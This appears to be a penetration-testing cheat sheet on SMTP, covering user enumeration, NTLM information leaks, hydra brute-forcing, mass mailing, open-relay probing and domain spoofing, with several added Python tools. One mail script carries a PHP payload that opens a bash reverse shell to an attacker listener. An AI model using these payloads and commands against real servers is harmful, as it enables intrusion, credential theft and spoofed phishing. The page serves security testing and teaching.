SMTP
Pentesting SMTP - TCP Ports 25,465,587
Theory
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used for sending e-mail. Default ports are 25 (SMTP, server-to-server relay, STARTTLS optional), 465 (SMTPS, implicit TLS) and 587 (message submission, STARTTLS).
Practice
Enumerate
Commands
We may use the EHLO and HELP commands to list the extended (ESMTP) commands an SMTP server supports, as follows
root@kali$ telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> EHLO all    # or EHLO domain.com
We may use the smtp-commands.nse nmap script
nmap --script smtp-commands -p 25,465,587 <target-ip>
Usernames
SMTP supports several interesting commands, such as VRFY, EXPN and RCPT TO.
VRFY asks the server to verify an email address.
EXPN asks the server for the membership of a mailing list (it expands an alias).
RCPT TO specifies an email recipient, but it triggers an "User unknown" error if the specified user does not exist.
These can often be abused to verify existing users on a mail server, which is useful information during a penetration test.
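Implementing the three checks in Python, as an added example that is not part of the original page: enumerate_users() takes any send(command) -> (code, message) callable, so it runs unchanged over smtplib.SMTP.docmd against a real server or over the constructed Sendmail-style test double included below. The envelope sender probe@example.com, the host name myhost and the name lists are assumptions; the reply codes are the ones seen in the transcripts further down. The catch-all check at the end is the caveat a practitioner needs: a server that accepts every RCPT TO makes positive results worthless.

```python
"""Added example (not from the original page): user enumeration over VRFY, EXPN
or RCPT TO, with reply classification and a catch-all check."""
import secrets
import smtplib


def classify_reply(code):
    """Map the SMTP reply code of a VRFY/EXPN/RCPT TO probe to a verdict."""
    if code == 250:
        return "exists"        # "250 Super-User <root@myhost>", "250 2.1.5 ed... Recipient ok"
    if code in (550, 551, 553):
        return "unknown"       # "550 5.1.1 test... User unknown"
    if code == 252:
        return "inconclusive"  # server declines to verify (e.g. Sendmail PrivacyOptions=goaway)
    if code in (500, 502, 504):
        return "unsupported"   # command disabled or not implemented
    return "inconclusive"


def enumerate_users(send, names, method="RCPT", domain=None, sender="probe@example.com"):
    """send(command_line) -> (code, message): smtplib.SMTP.docmd or a test double.
    'sender' is an assumed envelope sender, only needed for the RCPT TO method."""
    method = method.upper()

    def probe(name):
        addr = name if domain is None else f"{name}@{domain}"
        if method in ("VRFY", "EXPN"):
            return classify_reply(send(f"{method} {addr}")[0])
        return classify_reply(send(f"RCPT TO:<{addr}>")[0])

    if method == "RCPT":
        # One MAIL FROM per session is enough; the server accepts many RCPT TO after it.
        code, reply = send(f"MAIL FROM:<{sender}>")
        if code != 250:
            raise RuntimeError(f"MAIL FROM rejected: {code} {reply!r}")
    results = {name: probe(name) for name in names}
    # Catch-all check: if a random name that cannot exist is also accepted,
    # the server takes any recipient and the positives above prove nothing.
    if probe("nx" + secrets.token_hex(6)) == "exists":
        results = {name: "inconclusive" for name in names}
    return results


def enumerate_live(host, names, method="RCPT", domain=None, port=25, timeout=10):
    """Run the enumeration against a real server."""
    with smtplib.SMTP(host, port, timeout=timeout) as conn:
        conn.ehlo_or_helo_if_needed()
        return enumerate_users(conn.docmd, names, method, domain)


# Constructed test double modelled on the Sendmail transcripts on this page:
# root, ed and sshd exist, everything else is "User unknown".
def fake_sendmail(command):
    verb, _, arg = command.partition(" ")
    name = arg.removeprefix("TO:").strip("<>").split("@")[0]
    if verb == "MAIL":
        return 250, b"2.1.0 Sender ok"
    if name in {"root", "ed", "sshd"}:
        return 250, b"2.1.5 <" + name.encode() + b"@myhost>"
    return 550, b"5.1.1 " + name.encode() + b"... User unknown"


def fake_catchall(command):
    """Constructed double for a server that accepts every recipient."""
    return 250, b"2.1.5 Recipient ok"


if __name__ == "__main__":
    print(enumerate_users(fake_sendmail, ["root", "ed", "admin", "test"], method="VRFY"))
    print(enumerate_users(fake_sendmail, ["ed", "sshd", "www"], method="RCPT", domain="myhost"))
    print(enumerate_users(fake_catchall, ["root", "admin"], method="RCPT"))
```

Against a real target call enumerate_live("<target-ip>", names, method="VRFY"); a 252 reply means the server refuses to confirm the name but may still deliver to it, so fall back to RCPT TO and watch for the catch-all case.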
smtp-user-enum is a script for user enumeration via VRFY, EXPN and RCPT TO
# VRFY - check if the user exists on the SMTP server
smtp-user-enum -M VRFY -u <username> -t <target-ip>
smtp-user-enum -M VRFY -U usernames.txt -t <target-ip>
# RCPT - check if the user is allowed to receive mail on the SMTP server
smtp-user-enum -M RCPT -u <username> -t <target-ip>
smtp-user-enum -M RCPT -U usernames.txt -t <target-ip>
# EXPN - expand an alias or mailing list to the actual addresses (-D appends a domain to each name)
smtp-user-enum -M EXPN -u <username> -t <target-ip>
smtp-user-enum -M EXPN -D <hostname> -U usernames.txt -t <target-ip>
We may use the smtp-enum-users.nse nmap script
nmap --script smtp-enum-users -p 25,465,587 <target-ip>
We can use the VRFY command to enumerate users as follows
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
VRFY root
250 Super-User <root@myhost>
VRFY blah
550 blah... User unknown
We can use the EXPN command to enumerate users as follows
$ telnet 10.0.10.1 25
Trying 10.0.10.1...
Connected to 10.0.10.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 <ed.williams@myhost>
EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>
We can use the RCPT TO command to enumerate users as follows
$ telnet 10.0.10.1 25
Trying 10.0.10.1...
Connected to 10.0.10.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:<sender@example.com>
250 2.1.0 <sender@example.com>... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok
NTLM Auth - Information disclosure
If the server supports NTLM authentication (Windows, typically Exchange or the IIS SMTP service), the NTLM challenge it returns before any credential is sent discloses the host's NetBIOS and DNS names and the OS version.
We may leak this information as follows
root@kali$ telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM
334 NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
We may use the smtp-ntlm-info.nse nmap script
nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 <target-ip>

Connect
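Connecting from Python and doing the NTLM exchange shown in the previous section by hand, as an added example that is neither the page's code nor nmap's script: build_ntlm_negotiate() produces the client NEGOTIATE (with the same flags as the base64 in the exchange above), probe_smtp_ntlm() sends EHLO, STARTTLS if offered, AUTH NTLM and the negotiate over smtplib, and parse_ntlm_challenge() decodes the 334 reply according to the MS-NLMP CHALLENGE_MESSAGE layout. The server challenge quoted above is embedded so the decoder runs offline; the host and port for a live probe are whatever you pass on the command line.

```python
"""Added example (not from the original page): build the NTLM NEGOTIATE the client
sends after "AUTH NTLM" and decode the CHALLENGE the server answers with, which
discloses target name, NetBIOS/DNS names and OS version (MS-NLMP layout)."""
import base64
import smtplib
import struct
import sys
from datetime import datetime, timedelta, timezone

# The CHALLENGE_MESSAGE from the exchange above, so the decoder can run offline.
PAGE_CHALLENGE = (
    "TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9J"
    "AEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkA"
    "SQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA"
)
# Flags of the NEGOTIATE shown above: UNICODE|OEM|REQUEST_TARGET|NTLM|ALWAYS_SIGN|EXTENDED_SESSIONSECURITY
NEGOTIATE_FLAGS = 0x00088207
NTLMSSP_NEGOTIATE_VERSION = 0x02000000
AV_NAMES = {1: "NetBIOS computer name", 2: "NetBIOS domain name",
            3: "DNS computer name", 4: "DNS domain name", 5: "DNS tree name"}


def build_ntlm_negotiate(flags=NEGOTIATE_FLAGS):
    """Minimal 32-byte NEGOTIATE_MESSAGE: signature, type 1, flags, empty domain/workstation."""
    return base64.b64encode(b"NTLMSSP\x00" + struct.pack("<II", 1, flags) + b"\x00" * 16).decode()


def filetime_to_datetime(filetime):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_ntlm_challenge(b64):
    """Decode a base64 CHALLENGE_MESSAGE (type 2) into the fields worth reporting."""
    data = base64.b64decode(b64)
    if data[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", data, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", data, 12)   # TargetNameFields
    flags = struct.unpack_from("<I", data, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", data, 40)   # TargetInfoFields
    info = {
        "target_name": data[tn_off:tn_off + tn_len].decode("utf-16-le"),
        "flags": flags,
        "server_challenge": data[24:32].hex(),
        "target_info": {},
    }
    if flags & NTLMSSP_NEGOTIATE_VERSION:                      # Version block at offset 48
        major, minor, build = struct.unpack_from("<BBH", data, 48)
        info["os_version"] = (major, minor, build)             # (6, 3, 9600) = Windows 8.1 / Server 2012 R2
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:                                      # AV_PAIR list: id, len, value
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        if av_id == 0:                                         # MsvAvEOL
            break
        value = data[pos:pos + av_len]
        pos += av_len
        if av_id == 7:                                         # MsvAvTimestamp, a FILETIME
            info["target_info"]["Timestamp"] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            info["target_info"][AV_NAMES.get(av_id, f"AvId {av_id}")] = value.decode("utf-16-le")
    return info


def probe_smtp_ntlm(host, port=25, timeout=10):
    """Live probe: EHLO, STARTTLS if offered, AUTH NTLM, then decode the 334 challenge.
    Returns None when the server does not offer NTLM."""
    with smtplib.SMTP(host, port, timeout=timeout) as conn:
        conn.ehlo()
        if conn.has_extn("starttls"):
            conn.starttls()
            conn.ehlo()
        if "NTLM" not in conn.esmtp_features.get("auth", "").upper():
            return None
        if conn.docmd("AUTH NTLM")[0] != 334:                  # "334 NTLM supported"
            return None
        code, msg = conn.docmd(build_ntlm_negotiate())
        if code != 334:
            return None
        return parse_ntlm_challenge(msg.decode())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        result = probe_smtp_ntlm(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 25)
    else:
        result = parse_ntlm_challenge(PAGE_CHALLENGE)
    for key, value in (result or {}).items():
        print(f"{key}: {value}")
```

Run without arguments to decode the challenge quoted above (target IIS01, Windows 6.3 build 9600, a 2020 timestamp), or with a host and port to probe a live server. Nothing here needs a password: the disclosure happens before the client would send its AUTHENTICATE message.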
We may use the following commands to connect to an SMTP server
# Netcat
nc <target-ip> 25
# Telnet
telnet <target-ip> 25
# From Windows
dism /online /Enable-Feature /FeatureName:TelnetClient
telnet <target-ip> 25
We may use openssl to connect to an SMTP server over TLS
# Port 25 (opportunistic STARTTLS)
openssl s_client -starttls smtp -connect <target-ip>:25
# Port 465 (implicit TLS)
openssl s_client -crlf -connect <target-ip>:465
# Port 587 (submission, STARTTLS)
openssl s_client -starttls smtp -crlf -connect <target-ip>:587
Authentication Bruteforce
We may use hydra to brute-force SMTP accounts on the server
# Port 25
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
# Port 587 (submission; hydra upgrades to STARTTLS if the server advertises it)
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> smtp -v -V
# Port 465 (implicit TLS, hence -S)
hydra -l <username> -P /path/to/passwords.txt -s 465 <IP> smtp -S -v -V
We may use the smtp-brute.nse nmap script
nmap --script smtp-brute -p 25,465,587 <target-ip>
Send E-mail
swaks is a Swiss Army knife for SMTP; it can send mail from an arbitrary (for example external) sender address through the target server
# Basic usage
swaks --to <recipient@example.com> --from local-user@<local-ip> --server mail.example.com --header "Subject: test" --body "hello"
# Mass email (one recipient per line in the file "emails", joined with commas)
swaks --to "$(paste -sd, emails)" --from local-user@<local-ip> --server mail.example.com --header "Subject: test" --body "hello"
sendEmail is a lightweight, completely command-line based SMTP email agent.
# Send with an attachment
sendEmail -t <recipient@example.com> -f <sender@example.com> -s <SMTP_SRV_IP> -u "Important Upgrade Instructions" -a /tmp/BestComputers-UpgradeInstructions.pdf
We may use the following Python script to send emails
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys

lhost = "127.0.0.1"    # listener for the reverse shell in the payload
lport = 443
rhost = "192.168.1.1"  # target SMTP server
rport = 25             # or 465 (implicit TLS, use smtplib.SMTP_SSL), 587 (submission, STARTTLS)

# create message object instance
msg = MIMEMultipart()

# setup the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"

# payload: PHP reverse shell, for mail that ends up in a web-readable mail spool
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost, lport))
print("[*] Payload is generated : %s" % message)
msg.attach(MIMEText(message, 'plain'))

server = smtplib.SMTP(host=rhost, port=rport, timeout=10)
if server.noop()[0] != 250:
    print("[-] Connection Error")
    sys.exit(1)

# opportunistic STARTTLS: only if the server advertises it (a plain starttls() fails otherwise)
server.ehlo()
if server.has_extn("starttls"):
    server.starttls()
    server.ehlo()

# Uncomment if the server requires authentication
# server.login(msg['From'], password)

server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
print("[***] successfully sent email to %s" % msg['To'])
Mail Spoofing
Open Relay
To keep spoofed mail from being dropped by spam filters, the sender wants to route it through a relay server the recipient already trusts. Administrators often have no clear overview of which IP ranges actually need to relay through their server, and rather than risk breaking mail flow with current and prospective customers they allow every address. The result is an open relay, a misconfiguration we still find regularly in external and internal penetration tests. In Postfix it looks like this:
mynetworks = 0.0.0.0/0
We may use the smtp-open-relay nmap script to check whether an SMTP server allows mail relaying.
nmap -p25 --script smtp-open-relay <IP> -v

Tools
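Before the third-party tools, an added example in Python that is not part of the original page or of any tool it names: postfix_would_relay() models the relay decision behind the mynetworks setting quoted above (the default permit_mynetworks, reject_unauth_destination logic, simplified to mydestination only) so the weak 0.0.0.0/0 can be compared with a sane value, relay_probe_vectors() lists the envelope combinations an open-relay probe sends (the same idea as the nmap script), and probe_open_relay() runs them against a live server over smtplib. The LAN range 10.10.0.0/16, the host mail.example.com, the client address 203.0.113.7 and the relaytest/example.net addresses are placeholders.

```python
"""Added example (not from the original page): the Postfix relay decision behind
"mynetworks = 0.0.0.0/0", the safe setting beside it, and the envelope combinations
an open-relay probe sends (same idea as nmap's smtp-open-relay). Hosts, domains and
addresses are placeholders."""
import ipaddress
import smtplib

# Postfix mynetworks as the page quotes it (weak) versus a normal value (assumed LAN 10.10.0.0/16)
WEAK_MYNETWORKS = ["0.0.0.0/0"]
SAFE_MYNETWORKS = ["127.0.0.0/8", "10.10.0.0/16"]


def client_in_mynetworks(client_ip, mynetworks):
    """Postfix treats every client inside mynetworks as trusted and relays for it."""
    ip = ipaddress.ip_address(client_ip)
    return any(ip in ipaddress.ip_network(net, strict=False) for net in mynetworks)


def postfix_would_relay(client_ip, recipient, mynetworks, mydestination):
    """Simplified model of the default smtpd_relay_restrictions
    (permit_mynetworks, reject_unauth_destination): mail for a domain the server
    owns (mydestination) is always accepted, anything else only from mynetworks.
    Ignores virtual/relay_domains and SASL-authenticated clients."""
    rcpt_domain = recipient.strip("<>").rsplit("@", 1)[-1].lower()
    if rcpt_domain in {d.lower() for d in mydestination}:
        return True
    return client_in_mynetworks(client_ip, mynetworks)


def relay_probe_vectors(target_host, external_domain="example.net", user="relaytest"):
    """(MAIL FROM, RCPT TO) pairs that ask the server to forward mail it does not own:
    plain external delivery plus the %-hack, quoted-local-part, source-route and
    UUCP bang-path forms that older MTAs rewrote into a relay."""
    ext = f"{user}@{external_domain}"
    local = f"<{user}@{target_host}>"
    return [
        ("<>", f"<{ext}>"),
        (local, f"<{ext}>"),
        (local, f"<{user}%{external_domain}@{target_host}>"),
        (local, f'<"{ext}">'),
        (local, f"<@{target_host}:{ext}>"),
        (local, f"<{external_domain}!{user}>"),
    ]


def probe_open_relay(host, port=25, external_domain="example.net", timeout=10):
    """Live check: return the vectors the server accepts at RCPT TO (250).
    An accepted envelope is strong evidence; confirm with a mailbox you control."""
    accepted = []
    with smtplib.SMTP(host, port, timeout=timeout) as conn:
        conn.ehlo_or_helo_if_needed()
        for mail_from, rcpt_to in relay_probe_vectors(host, external_domain):
            conn.docmd("RSET")                                   # fresh envelope per vector
            if conn.docmd(f"MAIL FROM:{mail_from}")[0] != 250:
                continue
            if conn.docmd(f"RCPT TO:{rcpt_to}")[0] == 250:
                accepted.append((mail_from, rcpt_to))
    return accepted


if __name__ == "__main__":
    internet_client, external_rcpt = "203.0.113.7", "victim@example.net"
    for label, nets in (("weak", WEAK_MYNETWORKS), ("safe", SAFE_MYNETWORKS)):
        print(label, "mynetworks relays for an Internet client:",
              postfix_would_relay(internet_client, external_rcpt, nets, {"mail.example.com"}))
    for mail_from, rcpt_to in relay_probe_vectors("mail.example.com"):
        print(f"MAIL FROM:{mail_from}  RCPT TO:{rcpt_to}")
```

With 0.0.0.0/0 every Internet client falls inside mynetworks, so the server forwards mail for any destination; with the restricted value only local delivery and LAN clients pass. Call probe_open_relay("<target-ip>") to see which of the six vectors a live server accepts; the nmap script above sends the same kind of combinations.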
MagicSpoofing is a Python script that checks and tests SPF/DMARC DNS records and tries to spoof a domain through an open relay mail system.
# This will send a test email from a spoofed victim.com sender to <your-address@example.com>
python3 magicspoofmail.py -d victim.com -t -e <your-address@example.com>
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e <your-address@example.com> --subject TEST --sender <spoofed-user@victim.com>